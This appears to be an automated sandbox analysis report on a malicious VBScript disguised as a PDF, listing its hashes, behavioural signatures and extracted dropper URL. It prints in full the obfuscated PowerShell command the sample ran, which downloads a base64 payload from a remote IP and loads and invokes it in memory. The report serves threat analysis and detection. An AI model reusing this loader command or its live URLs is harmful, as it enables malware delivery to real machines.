Analysis
-
max time kernel
43s -
max time network
45s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
27-09-2022 19:45
Static task
static1
Behavioral task
behavioral1
Sample
TV06KSFYOU_002_PDF.vbs
Resource
win7-20220812-en
windows7-x64
5 signatures
150 seconds
General
-
Target
TV06KSFYOU_002_PDF.vbs
-
Size
577KB
-
MD5
92be06b804449682d272f3afc76aca5f
-
SHA1
f575b8712aa0f0720b6ad981ca8bbe682badd1d8
-
SHA256
e596d827af9b25d8348caffa981f5ef4a6ea88bfcfb35e5a5d2d337d6bf90aa9
-
SHA512
09b067ad4507a7efbd075a3d8400e63627d62d4bf9e542fb527755eac71240e556ae9b4f45e408e2b4d9dfe42688c18b9dd0a4007ca23dc77d8d16449808068c
-
SSDEEP
96:vHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHA:cKLosxvRG
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
http://20.7.14.99/dll/dll_ink.pdf
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 936 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 936 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 936 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
WScript.exedescription pid process target process PID 1964 wrote to memory of 936 1964 WScript.exe powershell.exe PID 1964 wrote to memory of 936 1964 WScript.exe powershell.exe PID 1964 wrote to memory of 936 1964 WScript.exe powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TV06KSFYOU_002_PDF.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/dll_ink.pdf'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('fdbd2471442d-d42a-e044-ff2d-d8c5491d=nekot&aidem=tla?txt.hdcnysaer/o/moc.topsppa.b3638-fhwen/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/936-55-0x0000000000000000-mapping.dmp
-
memory/936-57-0x000007FEF4460000-0x000007FEF4E83000-memory.dmpFilesize
10.1MB
-
memory/936-59-0x0000000002444000-0x0000000002447000-memory.dmpFilesize
12KB
-
memory/936-58-0x000007FEF3900000-0x000007FEF445D000-memory.dmpFilesize
11.4MB
-
memory/936-60-0x000000001B700000-0x000000001B9FF000-memory.dmpFilesize
3.0MB
-
memory/936-61-0x000000000244B000-0x000000000246A000-memory.dmpFilesize
124KB
-
memory/936-62-0x0000000002444000-0x0000000002447000-memory.dmpFilesize
12KB
-
memory/936-63-0x000000000244B000-0x000000000246A000-memory.dmpFilesize
124KB
-
memory/1964-54-0x000007FEFBFE1000-0x000007FEFBFE3000-memory.dmpFilesize
8KB